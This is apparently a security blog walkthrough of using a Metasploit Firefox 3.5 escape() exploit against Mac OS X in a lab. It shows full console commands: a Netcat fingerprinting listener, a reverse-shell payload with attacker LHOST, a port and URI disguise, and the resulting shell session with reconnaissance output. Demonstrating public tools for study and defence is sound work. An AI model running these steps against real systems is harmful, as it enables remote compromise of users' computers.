The exploit that was covered recently in an earlier blog post on the Firefox 3.5 escape () value memory corruption exploit that worked against Windows XP, this exploit has now been expanded to now cover OSX 10.5.7 and it has been improved so no script problem message is shown to the user requiring interaction by him. For use against an OSX target the attack might look something like this:

carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos: 
listening on [any] 80 ...
connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924
GET / HTTP/1.1
Host: 192.168.1.158
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

^C sent 0, rcvd 370

Here the target was trick initially to connect to a Netcat listener so we could look at the User Agent string to identify the target OS and Browser, this could have been also easily done creating a fake webpage and having the victim connect and look at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit, payload and setting the proper target:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >  show targets

Exploit targets:

   Id  Name                                      
   --  ----                                      
   0   Firefox 3.5.0 on Windows XP SP0-SP3       
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)  


msf exploit(firefox_escape_retval) > set TARGET 1
TARGET => 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

As it can be seen the payload selected was the vforkshell and one of the main advantages of this shell is that since it uses the vfork() Unix call to spawn it self it does not run under the process exploited so when the target kills the hanged browser we do not loose our shell access. Since we launched the exploit as root we can change the port to listen for the exploit to port 80 making it easier to exploit a target behind a Proxy or Firewall, change the URI path to one less suspicious and launch the exploit:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secretdocumets.html
[*]  Local IP: http://192.168.1.158:80/secretdocumets.html
[*] Server started.

Once the targets connects to our exploit it will launch the exploit javascript code with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...
[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)

Once the shell is created we can interact with it, one important thing to remember is that environment variables set for the shell are the ones for the process exploited so we will have to use full path when calling certain commands:

msf exploit(firefox_escape_retval) > sessions -l

Active sessions
===============

  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.158:4444 -> 192.168.1.120:52770  

msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...

id
uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
env
PWD=/sbin
SHLVL=1
_=/usr/bin/env
OLDPWD=/bin
/sbin/ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:9f:9e:11 
	media: autoselect status: inactive
	supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
	lladdr 00:17:f2:ff:fe:71:a7:b4 
	media: autoselect <full-duplex> status: inactive
	supported media: autoselect <full-duplex>
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6 
	inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255
	ether 00:17:f2:99:d7:cf 
	media: autoselect status: active
	supported media: autoselect
en4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:33:3e:50 
	media: autoselect status: inactive
	supported media: none autoselect 10baseT/UTP <half-duplex>
vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255
	ether 00:50:56:c0:00:08 
vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255
	ether 00:50:56:c0:00:01 
exit

[*] Command shell session 1 closed.

This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.

About the author